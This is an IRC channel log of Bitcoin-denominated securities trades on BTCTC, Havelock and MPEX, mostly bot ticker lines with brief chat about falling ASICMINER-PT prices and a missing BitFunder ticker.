06:39:52 [BTCTC] [BTCGARDEN] 9 @ 0.01555 = 0.14 BTC [-] Aug 07 06:39:54 [BTCTC] [BTCGARDEN] 35 @ 0.01555 = 0.5443 BTC [-] Aug 07 06:39:55 [BTCTC] [BTCGARDEN] 6 @ 0.01553 = 0.0932 BTC [-] Aug 07 06:39:56 [BTCTC] [BTCGARDEN] 220 @ 0.01552 = 3.4144 BTC [-] Aug 07 06:39:57 [BTCTC] [BTCGARDEN] 405 @ 0.01551 = 6.2816 BTC [-] Aug 07 06:39:58 [BTCTC] [BTCGARDEN] 500 @ 0.01551 = 7.755 BTC [-] Aug 07 06:40:00 [BTCTC] [BTCGARDEN] 15757 @ 0.0155 = 244.2335 BTC [-] Aug 07 06:40:07 [HAVELOCK] [AM100] 3 @ 0.0395 = 0.1185 BTC [-] Aug 07 06:40:31 [HAVELOCK] [XBOND] 11 @ 0.00103985 = 0.0114 BTC [+] Aug 07 06:45:13 [BTCTC] [LABCOIN] 50 @ 0.001561 = 0.0781 BTC [+] Aug 07 06:45:15 [BTCTC] [LABCOIN] 50 @ 0.00156 = 0.078 BTC [-] Aug 07 06:45:19 [BTCTC] [LABCOIN] 70 @ 0.001559 = 0.1091 BTC [-] Aug 07 06:45:25 [BTCTC] [LABCOIN] 1 @ 0.001511 BTC [-] Aug 07 06:45:27 [BTCTC] [LABCOIN] 10 @ 0.00151 = 0.0151 BTC [-] Aug 07 06:45:30 [BTCTC] [LABCOIN] 703 @ 0.001504 = 1.0573 BTC [-] Aug 07 06:45:34 [BTCTC] [LABCOIN] 1568 @ 0.001504 = 2.3583 BTC [-] Aug 07 06:45:38 [BTCTC] [LABCOIN] 10 @ 0.001503 = 0.015 BTC [-] Aug 07 06:45:43 [BTCTC] [LABCOIN] 10000 @ 0.001503 = 15.03 BTC [-] Aug 07 06:45:50 [BTCTC] [LABCOIN] 2538 @ 0.001502 = 3.8121 BTC [-] Aug 07 06:45:51 [BTCTC] [LABCOIN] 1482 @ 0.001501 = 2.2245 BTC [-] Aug 07 06:45:52 [BTCTC] [LABCOIN] 1880 @ 0.0015 = 2.82 BTC [-] Aug 07 06:45:52 [BTCTC] [LABCOIN] 2 @ 0.0015 = 0.003 BTC [-] Aug 07 06:45:53 [BTCTC] [LABCOIN] 500 @ 0.0015 = 0.75 BTC [-] Aug 07 06:45:54 [BTCTC] [LABCOIN] 9078 @ 0.0015 = 13.617 BTC [-] Aug 07 06:45:55 [BTCTC] [LABCOIN] 400 @ 0.0015 = 0.6 BTC [-] Aug 07 06:45:56 [BTCTC] [LABCOIN] 418 @ 0.001492 = 0.6237 BTC [-] Aug 07 06:45:57 [BTCTC] [LABCOIN] 3346 @ 0.001491 = 4.9889 BTC [-] Aug 07 06:45:58 [BTCTC] [LABCOIN] 250 @ 0.001482 = 0.3705 BTC [-] Aug 07 06:45:59 [BTCTC] [LABCOIN] 2000 @ 0.001481 = 2.962 BTC [-] Aug 07 06:46:00 [BTCTC] [LABCOIN] 37 @ 0.00148 = 0.0548 BTC [-] Aug 07 06:46:02 [BTCTC] [LABCOIN] 300 @ 0.001479 = 0.4437 BTC [-] Aug 07 06:46:03 [BTCTC] [LABCOIN] 15 @ 0.001456 = 0.0218 BTC [-] Aug 07 06:46:03 [BTCTC] [LABCOIN] 120 @ 0.001455 = 0.1746 BTC [-] Aug 07 06:46:04 [BTCTC] [LABCOIN] 106 @ 0.001453 = 0.154 BTC [-] Aug 07 06:46:05 [BTCTC] [LABCOIN] 850 @ 0.001452 = 1.2342 BTC [-] Aug 07 06:46:06 [BTCTC] [LABCOIN] 30 @ 0.001451 = 0.0435 BTC [-] Aug 07 06:46:07 [BTCTC] [LABCOIN] 7743 @ 0.00145 = 11.2274 BTC [-] Aug 07 06:47:09 I just realized there is no ticker here for BitFunder Aug 07 06:47:18 is it because they don't have API? Aug 07 06:48:24 [BTCTC] [LABCOIN] 1412 @ 0.00163 = 2.3016 BTC [+] Aug 07 06:51:02 They have their own channel actually Aug 07 06:51:21 On # bitfunder Aug 07 06:51:42 rulother-gs thanks Aug 07 06:51:46 [BTCTC] [ASICMINER-PT] 1 @ 3.91 BTC [-] Aug 07 06:51:47 [BTCTC] [ASICMINER-PT] 1 @ 3.905 BTC [-] Aug 07 06:51:49 [BTCTC] [ASICMINER-PT] 3 @ 3.902 = 11.706 BTC [-] Aug 07 06:51:50 [BTCTC] [ASICMINER-PT] 2 @ 3.901 = 7.802 BTC [-] Aug 07 06:51:52 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [-] Aug 07 06:52:02 [BTCTC] [ASICMINER-PT] 4 @ 3.9 = 15.6 BTC [-] Aug 07 06:52:03 [BTCTC] [ASICMINER-PT] 1 @ 3.892 BTC [-] Aug 07 06:52:05 [BTCTC] [ASICMINER-PT] 3 @ 3.891 = 11.673 BTC [-] Aug 07 06:52:06 [BTCTC] [ASICMINER-PT] 1 @ 3.865 BTC [-] Aug 07 06:53:43 [BTCTC] [COGNITIVE] 4 @ 0.3901 = 1.5604 BTC [-] Aug 07 06:53:44 [BTCTC] [COGNITIVE] 1 @ 0.3901 BTC [-] Aug 07 06:53:46 [BTCTC] [COGNITIVE] 2 @ 0.3801 = 0.7602 BTC [-] Aug 07 06:53:47 [BTCTC] [COGNITIVE] 2 @ 0.3772 = 0.7544 BTC [-] Aug 07 06:53:49 [BTCTC] [COGNITIVE] 8 @ 0.3501 = 2.8008 BTC [-] Aug 07 06:53:58 [BTCTC] [COGNITIVE] 10 @ 0.35 = 3.5 BTC [-] Aug 07 06:54:01 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [-] Aug 07 06:54:02 [BTCTC] [COGNITIVE] 1 @ 0.3313 BTC [-] Aug 07 06:54:03 [BTCTC] [COGNITIVE] 2 @ 0.3301 = 0.6602 BTC [-] Aug 07 06:54:09 [BTCTC] [COGNITIVE] 19 @ 0.33 = 6.27 BTC [-] Aug 07 06:54:44 [BTCTC] [ACTIVEMINING] 68 @ 0.005751 = 0.3911 BTC [+] Aug 07 06:54:45 [BTCTC] [ACTIVEMINING] 15 @ 0.00575 = 0.0863 BTC [-] Aug 07 06:54:47 [BTCTC] [ACTIVEMINING] 125 @ 0.005601 = 0.7001 BTC [-] Aug 07 06:54:48 [BTCTC] [ACTIVEMINING] 625 @ 0.0056 = 3.5 BTC [-] Aug 07 06:54:50 [BTCTC] [ACTIVEMINING] 330 @ 0.005511 = 1.8186 BTC [-] Aug 07 06:54:51 [BTCTC] [ACTIVEMINING] 50 @ 0.005511 = 0.2756 BTC [-] Aug 07 06:54:52 [BTCTC] [ACTIVEMINING] 86 @ 0.00551 = 0.4739 BTC [-] Aug 07 06:55:38 [BTCTC] [ASICMINER-PT] 1 @ 3.865 BTC [-] Aug 07 06:55:39 [BTCTC] [ASICMINER-PT] 1 @ 3.861 BTC [-] Aug 07 06:55:40 [BTCTC] [ASICMINER-PT] 4 @ 3.86 = 15.44 BTC [-] Aug 07 06:55:41 [BTCTC] [ASICMINER-PT] 1 @ 3.851 BTC [-] Aug 07 06:55:43 [BTCTC] [ASICMINER-PT] 10 @ 3.85 = 38.5 BTC [-] Aug 07 06:55:44 [BTCTC] [ASICMINER-PT] 9 @ 3.85 = 34.65 BTC [-] Aug 07 06:55:45 [BTCTC] [ASICMINER-PT] 2 @ 3.837 = 7.674 BTC [-] Aug 07 06:55:46 [BTCTC] [ASICMINER-PT] 1 @ 3.833 BTC [-] Aug 07 06:55:48 [BTCTC] [ASICMINER-PT] 2 @ 3.833 = 7.666 BTC [-] Aug 07 06:55:49 [BTCTC] [ASICMINER-PT] 5 @ 3.83 = 19.15 BTC [-] Aug 07 06:55:50 [BTCTC] [ASICMINER-PT] 4 @ 3.823 = 15.292 BTC [-] Aug 07 06:55:51 [BTCTC] [ASICMINER-PT] 2 @ 3.815 = 7.63 BTC [-] Aug 07 06:55:52 [HAVELOCK] [XBOND] 500 @ 0.001026 = 0.513 BTC [-] Aug 07 06:55:54 [BTCTC] [ASICMINER-PT] 5 @ 3.81 = 19.05 BTC [-] Aug 07 06:55:55 [BTCTC] [ASICMINER-PT] 1 @ 3.81 BTC [-] Aug 07 06:55:56 [BTCTC] [ASICMINER-PT] 6 @ 3.81 = 22.86 BTC [-] Aug 07 06:55:58 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 07 06:56:00 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [-] Aug 07 06:56:02 [BTCTC] [ASICMINER-PT] 2 @ 3.75 = 7.5 BTC [-] Aug 07 06:56:03 [BTCTC] [ASICMINER-PT] 1 @ 3.701 BTC [-] Aug 07 06:56:05 [BTCTC] [ASICMINER-PT] 10 @ 3.701 = 37.01 BTC [-] Aug 07 06:56:06 [BTCTC] [ASICMINER-PT] 1 @ 3.701 BTC [-] Aug 07 06:56:06 [BTCTC] [ASICMINER-PT] 10 @ 3.69 = 36.9 BTC [-] Aug 07 06:56:07 [BTCTC] [ASICMINER-PT] 25 @ 3.66 = 91.5 BTC [-] Aug 07 06:56:51 [BTCTC] [ASICMINER-PT] 5 @ 3.659 = 18.295 BTC [-] Aug 07 06:56:52 [BTCTC] [ASICMINER-PT] 1 @ 3.66 BTC [+] Aug 07 06:57:00 <[1]lewicki> ruh roh Aug 07 06:57:04 [BTCTC] [ASICMINER-PT] 24 @ 3.66 = 87.84 BTC [+] Aug 07 06:57:29 [HAVELOCK] [AM100] 3 @ 0.03810001 = 0.1143 BTC [-] Aug 07 06:57:39 [BTCTC] [ASICMINER-PT] 1 @ 3.66 BTC [+] Aug 07 06:57:51 [HAVELOCK] [AM100] 5 @ 0.0381 = 0.1905 BTC [-] Aug 07 06:58:03 [HAVELOCK] [AM100] 10 @ 0.038 = 0.38 BTC [-] Aug 07 06:58:48 [HAVELOCK] [HIM] 5 @ 0.14439999 = 0.722 BTC [+] Aug 07 06:59:05 [HAVELOCK] [HIM] 3 @ 0.1444 = 0.4332 BTC [+] Aug 07 06:59:38 [BTCTC] [LABCOIN] 235 @ 0.001462 = 0.3436 BTC [-] Aug 07 06:59:38 [BTCTC] [LABCOIN] 500 @ 0.00146 = 0.73 BTC [-] Aug 07 06:59:40 [BTCTC] [LABCOIN] 685 @ 0.001453 = 0.9953 BTC [-] Aug 07 06:59:49 [BTCTC] [BTCGARDEN] 28 @ 0.01553 = 0.4348 BTC [+] Aug 07 06:59:50 [BTCTC] [BTCGARDEN] 100 @ 0.01552 = 1.552 BTC [-] Aug 07 06:59:52 [BTCTC] [BTCGARDEN] 498 @ 0.01551 = 7.724 BTC [-] Aug 07 06:59:53 [BTCTC] [BTCGARDEN] 2874 @ 0.0155 = 44.547 BTC [-] Aug 07 07:00:23 [BTCTC] [ASICMINER-PT] 2 @ 3.655 = 7.31 BTC [-] Aug 07 07:00:26 [BTCTC] [ASICMINER-PT] 26 @ 3.622 = 94.172 BTC [-] Aug 07 07:00:29 [BTCTC] [ASICMINER-PT] 30 @ 3.621 = 108.63 BTC [-] Aug 07 07:00:32 [BTCTC] [ASICMINER-PT] 11 @ 3.61 = 39.71 BTC [-] Aug 07 07:00:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.0403 = 0.3627 BTC [-] Aug 07 07:01:17 [BTCTC] [LABCOIN] 2 @ 0.001454 = 0.0029 BTC [+] Aug 07 07:01:20 [BTCTC] [ASICMINER-PT] 4 @ 3.66 = 14.64 BTC [+] Aug 07 07:01:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.04001 = 0.4801 BTC [-] Aug 07 07:02:07 [BTCTC] [LABCOIN] 233 @ 0.001454 = 0.3388 BTC [+] Aug 07 07:02:08 [BTCTC] [LABCOIN] 315 @ 0.001453 = 0.4577 BTC [-] Aug 07 07:02:10 [BTCTC] [LABCOIN] 652 @ 0.001451 = 0.9461 BTC [-] Aug 07 07:02:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.04 = 0.12 BTC [-] Aug 07 07:02:49 [BTCTC] [LABCOIN] 235 @ 0.001452 = 0.3412 BTC [+] Aug 07 07:02:51 [BTCTC] [LABCOIN] 765 @ 0.001451 = 1.11 BTC [-] Aug 07 07:02:56 [BTCTC] [ASICMINER-PT] 5 @ 3.661 = 18.305 BTC [+] Aug 07 07:03:00 [BTCTC] [ASICMINER-PT] 10 @ 3.66 = 36.6 BTC [-] Aug 07 07:03:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.0397 = 0.5955 BTC [-] Aug 07 07:03:55 [BTCTC] [LABCOIN] 163 @ 0.001451 = 0.2365 BTC [-] Aug 07 07:04:03 [BTCTC] [LABCOIN] 837 @ 0.00145 = 1.2137 BTC [-] Aug 07 07:04:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0396 = 0.1188 BTC [-] Aug 07 07:04:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.0396 = 0.198 BTC [-] Aug 07 07:04:19 [BTCTC] [TAT.ASICMINER] 7 @ 0.0396 = 0.2772 BTC [-] Aug 07 07:05:08 [BTCTC] [TAT.ASICMINER] 9 @ 0.03955 = 0.356 BTC [-] Aug 07 07:05:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.03919 = 0.4311 BTC [-] Aug 07 07:05:24 [BTCTC] [TAT.ASICMINER] 39 @ 0.03918 = 1.528 BTC [-] Aug 07 07:05:54 [BTCTC] [TAT.ASICMINER] 13 @ 0.03918 = 0.5093 BTC [-] Aug 07 07:07:06 [BTCTC] [BASIC-MINING] 1 @ 0.3992 BTC [+] Aug 07 07:07:59 [BTCTC] [BTCGARDEN] 28 @ 0.01551 = 0.4343 BTC [+] Aug 07 07:08:00 [BTCTC] [BTCGARDEN] 569 @ 0.0155 = 8.8195 BTC [-] Aug 07 07:08:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0025 BTC [-] Aug 07 07:08:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.03918 = 0.1175 BTC [-] Aug 07 07:08:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Aug 07 07:08:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.03895 = 0.0779 BTC [-] Aug 07 07:08:32 [BTCTC] [TAT.ASICMINER] 14 @ 0.03894 = 0.5452 BTC [-] Aug 07 07:08:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.03891 = 0.3891 BTC [-] Aug 07 07:08:35 [BTCTC] [TAT.ASICMINER] 53 @ 0.0389 = 2.0617 BTC [-] Aug 07 07:08:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0389 = 0.1945 BTC [-] Aug 07 07:08:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.0389 = 0.1556 BTC [-] Aug 07 07:10:04 i'm glad people are actually taking the time to question companies and actually talk about valuation and stuff Aug 07 07:10:09 maybe there is hope Aug 07 07:10:40 [BTCTC] [BITVPS] 236 @ 0.001951 = 0.4604 BTC [-] Aug 07 07:10:42 [BTCTC] [BITVPS] 50 @ 0.001901 = 0.0951 BTC [-] Aug 07 07:10:43 [BTCTC] [BITVPS] 214 @ 0.0019 = 0.4066 BTC [-] Aug 07 07:11:41 Eh? Aug 07 07:12:27 https://bitcointalk.org/index.php?topic=269191.0 Aug 07 07:12:36 [HAVELOCK] Crypto Currency (CFIG) Official Thread Aug 07 07:14:16 [BTCTC] [LABCOIN] 1420 @ 0.00145 = 2.059 BTC [-] Aug 07 07:14:35 [BTCTC] [DMS.MINING] 6 @ 0.006634 = 0.0398 BTC [+] Aug 07 07:14:50 [BTCTC] [ASICMINER-PT] 1 @ 3.796 BTC [+] Aug 07 07:14:52 [BTCTC] [ASICMINER-PT] 1 @ 3.797 BTC [+] Aug 07 07:15:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002499 BTC [-] Aug 07 07:15:23 [BTCTC] [LABCOIN] 100 @ 0.001421 = 0.1421 BTC [-] Aug 07 07:15:24 [BTCTC] [LABCOIN] 50 @ 0.001413 = 0.0707 BTC [-] Aug 07 07:15:25 [BTCTC] [LABCOIN] 28 @ 0.001411 = 0.0395 BTC [-] Aug 07 07:15:26 [BTCTC] [LABCOIN] 600 @ 0.001411 = 0.8466 BTC [-] Aug 07 07:15:27 [BTCTC] [LABCOIN] 2000 @ 0.001406 = 2.812 BTC [-] Aug 07 07:15:28 [BTCTC] [LABCOIN] 1000 @ 0.001405 = 1.405 BTC [-] Aug 07 07:15:30 [BTCTC] [LABCOIN] 125 @ 0.001403 = 0.1754 BTC [-] Aug 07 07:15:31 [BTCTC] [LABCOIN] 100 @ 0.001403 = 0.1403 BTC [-] Aug 07 07:15:32 [BTCTC] [LABCOIN] 3500 @ 0.001401 = 4.9035 BTC [-] Aug 07 07:16:18 [BTCTC] [LABCOIN] 1 @ 0.0014 BTC [-] Aug 07 07:16:22 [BTCTC] [LABCOIN] 800 @ 0.0014 = 1.12 BTC [-] Aug 07 07:17:16 [BTCTC] [BTCGARDEN] 1133 @ 0.0155 = 17.5615 BTC [-] Aug 07 07:17:49 [BTCTC] [LABCOIN] 30 @ 0.001399 = 0.042 BTC [-] Aug 07 07:18:33 [BTCTC] [LABCOIN] 1890 @ 0.001399 = 2.6441 BTC [-] Aug 07 07:19:49 [BTCTC] [BTCGARDEN] 1000 @ 0.0155 = 15.5 BTC [-] Aug 07 07:20:50 [BTCTC] [BITVPS] 286 @ 0.0019 = 0.5434 BTC [-] Aug 07 07:20:52 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [-] Aug 07 07:20:53 [BTCTC] [BITVPS] 30 @ 0.001802 = 0.0541 BTC [-] Aug 07 07:20:54 [BTCTC] [BITVPS] 187 @ 0.001802 = 0.337 BTC [-] Aug 07 07:20:56 [BTCTC] [ASICMINER-PT] 4 @ 3.799 = 15.196 BTC [+] Aug 07 07:21:52 [BTCTC] [DMS.MINING] 33 @ 0.006634 = 0.2189 BTC [+] Aug 07 07:21:54 [BTCTC] [DMS.MINING] 30 @ 0.006635 = 0.1991 BTC [+] Aug 07 07:21:55 [BTCTC] [DMS.MINING] 35 @ 0.00664 = 0.2324 BTC [+] Aug 07 07:21:56 [BTCTC] [DMS.MINING] 7 @ 0.006649 = 0.0465 BTC [+] Aug 07 07:21:57 [BTCTC] [DMS.MINING] 14 @ 0.00665 = 0.0931 BTC [+] Aug 07 07:21:57 [BTCTC] [DMS.MINING] 50 @ 0.00668 = 0.334 BTC [+] Aug 07 07:21:58 [BTCTC] [DMS.MINING] 40 @ 0.006683 = 0.2673 BTC [+] Aug 07 07:22:00 [BTCTC] [DMS.MINING] 86 @ 0.006684 = 0.5748 BTC [+] Aug 07 07:24:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.03879 = 0.1552 BTC [-] Aug 07 07:24:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.03878 = 0.7756 BTC [-] Aug 07 07:24:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.03867 = 0.232 BTC [-] Aug 07 07:25:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.03866 = 0.0773 BTC [-] Aug 07 07:25:26 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [+] Aug 07 07:25:42 [HAVELOCK] [AM1] 1 @ 3.822 BTC [-] Aug 07 07:25:45 [HAVELOCK] [AM1] 1 @ 3.821 BTC [-] Aug 07 07:25:46 [HAVELOCK] [AM1] 4 @ 3.801 = 15.204 BTC [-] Aug 07 07:25:48 [HAVELOCK] [AM1] 1 @ 3.80000003 BTC [-] Aug 07 07:25:50 [HAVELOCK] [AM1] 3 @ 3.8 = 11.4 BTC [-] Aug 07 07:29:34 [BTCTC] [BASIC-MINING] 1 @ 0.3977 BTC [-] Aug 07 07:33:02 [BTCTC] [ASICMINER-PT] 9 @ 3.8 = 34.2 BTC [+] Aug 07 07:33:14 [BTCTC] [ASICMINER-PT] 16 @ 3.89 = 62.24 BTC [+] Aug 07 07:35:04 topace: is CFIG yours or are you just announcing it there Aug 07 07:35:44 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [+] Aug 07 07:35:45 [BTCTC] [BASIC-MINING] 1 @ 0.3978 BTC [+] Aug 07 07:36:23 [HAVELOCK] [XBOND] 100 @ 0.00103985 = 0.104 BTC [+] Aug 07 07:37:25 [BTCTC] [LABCOIN] 235 @ 0.00149 = 0.3502 BTC [+] Aug 07 07:37:26 [BTCTC] [LABCOIN] 29 @ 0.001491 = 0.0432 BTC [+] Aug 07 07:43:11 [BTCTC] [ACTIVEMINING] 17 @ 0.005774 = 0.0982 BTC [+] Aug 07 07:43:26 [BTCTC] [BASIC-MINING] 1 @ 0.3978 BTC [+] Aug 07 07:43:37 [BTCTC] [DMS.SELLING] 1 @ 0.0229 BTC [-] Aug 07 07:44:40 [MPEX] [S.MPOE] 500 @ 0.00082682 = 0.4134 BTC [-] Aug 07 07:47:06 [BTCTC] [BTCGARDEN] 75 @ 0.01576 = 1.182 BTC [+] Aug 07 07:47:07 [BTCTC] [BTCGARDEN] 125 @ 0.01577 = 1.9713 BTC [+] Aug 07 07:49:49 [HAVELOCK] [AM100] 297 @ 0.038 = 11.286 BTC [-] Aug 07 07:50:37 [BTCTC] [BTCGARDEN] 1 @ 0.01575 BTC [-] Aug 07 07:53:13 [HAVELOCK] [AM100] 105 @ 0.038 = 3.99 BTC [-] Aug 07 07:53:20 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [+] Aug 07 07:53:54 [BTCTC] [BASIC-MINING] 1 @ 0.3975 BTC [-] Aug 07 07:57:40 [HAVELOCK] [AM100] 168 @ 0.038 = 6.384 BTC [-] Aug 07 07:58:28 [BTCTC] [ACTIVEMINING] 10 @ 0.005758 = 0.0576 BTC [-] Aug 07 07:58:29 [BTCTC] [ACTIVEMINING] 51 @ 0.005759 = 0.2937 BTC [+] Aug 07 07:59:43 [HAVELOCK] [AM100] 2 @ 0.038 = 0.076 BTC [-] Aug 07 08:00:24 [BTCTC] [ASICMINER-PT] 1 @ 3.885 BTC [-] Aug 07 08:03:46 [BTCTC] [BTCGARDEN] 59 @ 0.01576 = 0.9298 BTC [+] Aug 07 08:05:54 [BTCTC] [LABCOIN] 200 @ 0.001463 = 0.2926 BTC [-] Aug 07 08:06:23 [BTCTC] [ACTIVEMINING] 3000 @ 0.005764 = 17.292 BTC [+] Aug 07 08:07:21 [BTCTC] [LABCOIN] 35 @ 0.001461 = 0.0511 BTC [-] Aug 07 08:15:12 why is asicminer-pt crashing so hard? Aug 07 08:16:05 [HAVELOCK] [XBOND] 3 @ 0.00103984 = 0.0031 BTC [-] Aug 07 08:19:21 [BTCTC] [LABCOIN] 235 @ 0.001448 = 0.3403 BTC [-] Aug 07 08:21:58 [BTCTC] [ASICMINER-PT] 1 @ 3.691 BTC [-] Aug 07 08:22:00 [BTCTC] [ASICMINER-PT] 2 @ 3.69 = 7.38 BTC [-] Aug 07 08:22:01 [BTCTC] [ASICMINER-PT] 1 @ 3.683 BTC [-] Aug 07 08:22:02 [BTCTC] [ASICMINER-PT] 1 @ 3.681 BTC [-] Aug 07 08:22:04 [BTCTC] [ASICMINER-PT] 1 @ 3.678 BTC [-] Aug 07 08:22:05 [BTCTC] [ASICMINER-PT] 1 @ 3.672 BTC [-] Aug 07 08:22:06 [BTCTC] [ASICMINER-PT] 1 @ 3.666 BTC [-] Aug 07 08:22:07 [BTCTC] [ASICMINER-PT] 1 @ 3.662 BTC [-] Aug 07 08:22:09 [BTCTC] [ASICMINER-PT] 2 @ 3.635 = 7.27 BTC [-] Aug 07 08:22:10 [BTCTC] [ASICMINER-PT] 4 @ 3.634 = 14.536 BTC [-] Aug 07 08:22:10 [BTCTC] [ASICMINER-PT] 1 @ 3.633 BTC [-] Aug 07 08:22:11 [BTCTC] [ASICMINER-PT] 1 @ 3.63 BTC [-] Aug 07 08:22:12 [BTCTC] [ASICMINER-PT] 2 @ 3.621 = 7.242 BTC [-] Aug 07 08:22:13 [BTCTC] [ASICMINER-PT] 2 @ 3.62 = 7.24 BTC [-] Aug 07 08:22:14 [BTCTC] [ASICMINER-PT] 2 @ 3.62 = 7.24 BTC [-] Aug 07 08:22:16 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [-] Aug 07 08:22:17 [BTCTC] [ASICMINER-PT] 4 @ 3.611 = 14.444 BTC [-] Aug 07 08:22:18 [BTCTC] [ASICMINER-PT] 22 @ 3.61 = 79.42 BTC [-] Aug 07 08:25:50 no news is bad news Aug 07 08:26:03 [BTCTC] [DMS.PURCHASE] 50 @ 0.02832 = 1.416 BTC [+] Aug 07 08:27:52 ;;nethash Aug 07 08:27:53 353338.572674 Aug 07 08:28:01 ;;estimate Aug 07 08:28:02 Next difficulty estimate | None based on data since last change | 49360075.1956 based on data for last three days Aug 07 08:28:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.03968 = 0.7936 BTC [+] Aug 07 08:32:34 [HAVELOCK] [AM100] 50 @ 0.038 = 1.9 BTC [-] Aug 07 08:33:58 [BTCTC] [ASICMINER-PT] 1 @ 3.63 BTC [+] Aug 07 08:33:58 [BTCTC] [ASICMINER-PT] 2 @ 3.63 = 7.26 BTC [+] Aug 07 08:35:36 [BTCTC] [ASICMINER-PT] 1 @ 3.62 BTC [-] Aug 07 08:35:37 [BTCTC] [ASICMINER-PT] 1 @ 3.62 BTC [-] Aug 07 08:39:41 [BTCTC] [DMS.SELLING] 8 @ 0.0229 = 0.1832 BTC [-] Aug 07 08:40:01 [HAVELOCK] [XBOND] 5 @ 0.001026 = 0.0051 BTC [-] Aug 07 08:40:24 [HAVELOCK] [XBOND] 20 @ 0.001026 = 0.0205 BTC [-] Aug 07 08:40:47 [HAVELOCK] [AM100] 1 @ 0.039498 BTC [+] Aug 07 08:41:17 [HAVELOCK] [XBOND] 40 @ 0.001026 = 0.041 BTC [-] Aug 07 08:41:25 [BTCTC] [TAT.VIRTUALMINE] 95 @ 0.002499 = 0.2374 BTC [-] Aug 07 08:41:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00235 BTC [-] Aug 07 08:41:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0023 BTC [-] Aug 07 08:41:30 [BTCTC] [TAT.VIRTUALMINE] 535 @ 0.002251 = 1.2043 BTC [-] Aug 07 08:41:32 [HAVELOCK] [AM100] 1 @ 0.039498 BTC [+] Aug 07 08:41:35 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.00225 = 0.27 BTC [-] Aug 07 08:41:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0022 BTC [-] Aug 07 08:41:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0021 BTC [-] Aug 07 08:41:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00204 BTC [-] Aug 07 08:41:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002 BTC [-] Aug 07 08:41:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0018 BTC [-] Aug 07 08:42:09 [BTCTC] [DMS.MINING] 14 @ 0.006668 = 0.0934 BTC [-] Aug 07 08:42:18 [BTCTC] [ACTIVEMINING] 800 @ 0.005764 = 4.6112 BTC [+] Aug 07 08:42:20 [BTCTC] [ACTIVEMINING] 2 @ 0.005611 = 0.0112 BTC [-] Aug 07 08:42:20 [BTCTC] [ACTIVEMINING] 14 @ 0.00561 = 0.0785 BTC [-] Aug 07 08:42:21 [BTCTC] [ACTIVEMINING] 50 @ 0.005606 = 0.2803 BTC [-] Aug 07 08:42:22 [BTCTC] [ACTIVEMINING] 134 @ 0.005605 = 0.7511 BTC [-] Aug 07 08:42:55 [BTCTC] [LABCOIN] 10 @ 0.001431 = 0.0143 BTC [-] Aug 07 08:42:57 [BTCTC] [LABCOIN] 235 @ 0.00143 = 0.3361 BTC [-] Aug 07 08:42:58 [BTCTC] [LABCOIN] 29 @ 0.001426 = 0.0414 BTC [-] Aug 07 08:42:59 [BTCTC] [LABCOIN] 1500 @ 0.001425 = 2.1375 BTC [-] Aug 07 08:43:00 [BTCTC] [LABCOIN] 768 @ 0.001422 = 1.0921 BTC [-] Aug 07 08:43:02 [HAVELOCK] [XBOND] 32 @ 0.001026 = 0.0328 BTC [-] Aug 07 08:43:24 [HAVELOCK] [XBOND] 1 @ 0.001026 BTC [-] Aug 07 08:43:37 [HAVELOCK] [AM100] 1 @ 0.039498 BTC [+] Aug 07 08:43:50 [BTCTC] [ASICMINER-PT] 1 @ 3.797 BTC [+] Aug 07 08:44:47 [BTCTC] [BTCGARDEN] 186 @ 0.01576 = 2.9314 BTC [+] Aug 07 08:49:40 [BTCTC] [ASICMINER-PT] 1 @ 3.797 BTC [+] Aug 07 08:50:29 [HAVELOCK] [AM1] 1 @ 3.8 BTC [-] Aug 07 08:54:49 [BTCTC] [ACTIVEMINING] 68 @ 0.005608 = 0.3813 BTC [+] Aug 07 08:56:22 [BTCTC] [LABCOIN] 563 @ 0.001422 = 0.8006 BTC [-] Aug 07 09:00:20 got one at 3.63 Aug 07 09:01:09 but as previously stated, we could see 3 before 5 Aug 07 09:02:43 [BTCTC] [LABCOIN] 12 @ 0.001424 = 0.0171 BTC [+] Aug 07 09:02:44 [BTCTC] [LABCOIN] 100 @ 0.001425 = 0.1425 BTC [+] Aug 07 09:03:23 [BTCTC] [LABCOIN] 50 @ 0.001449 = 0.0725 BTC [+] Aug 07 09:03:24 [BTCTC] [LABCOIN] 1000 @ 0.00145 = 1.45 BTC [+] Aug 07 09:03:26 [BTCTC] [LABCOIN] 235 @ 0.001469 = 0.3452 BTC [+] Aug 07 09:03:27 [BTCTC] [LABCOIN] 511 @ 0.001471 = 0.7517 BTC [+] Aug 07 09:03:28 [BTCTC] [LABCOIN] 3346 @ 0.001472 = 4.9253 BTC [+] Aug 07 09:03:29 [BTCTC] 